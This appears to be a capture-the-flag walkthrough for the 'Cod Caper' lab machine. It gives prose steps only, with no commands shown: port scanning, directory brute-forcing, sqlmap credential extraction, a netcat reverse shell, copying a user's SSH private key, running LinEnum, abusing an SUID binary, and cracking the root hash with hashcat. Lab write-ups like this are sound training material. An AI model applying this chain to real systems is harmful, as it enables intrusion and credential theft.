The Cod Caper
Let's run an nmap scan to find open ports and the services running on them.
Let's check the webpage.
It's a default Apache2 page, so let's run gobuster to find hidden files and directories.
Let's use sqlmap to find more information.
Let's check the administrator.php page and log in with the credentials we found.
Looks like we can run commands. Let's get a reverse shell on the machine; first we start a netcat listener.
Now let's run the reverse shell command.
We have a shell. Let's stabilize the shell.
Let's look at how many files are in the current directory.
Let's check if pingu still has his account on this machine.
Looks like he does.
Let's look for interesting files belonging to www-data.
Let's look at this interesting file.
Looks like a password.
Let's now go get the private SSH key of pingu.
Let's cat the contents of id_rsa and copy it to our machine, saving the file as id_rsa.
Now let's set the permissions for the file and log in with the password we found.
Let's use the second method. First, on our machine, let's cd into the directory where the LinEnum file is located and start an HTTP server on port 8000.
Now let's go to the /tmp folder on the victim machine and download the file.
Now let's give it executable permissions and run the file.
Once we run the file we get a lot of information. Looking at the SUID files, we see an interesting one that is not common.
Let's use the manual way.
Let's cd into the /opt/secret directory and run the command to get the hash of the root user.
We have the hash. Let's copy it, save it on our machine in a file called hash, and crack it using hashcat.
We have the password.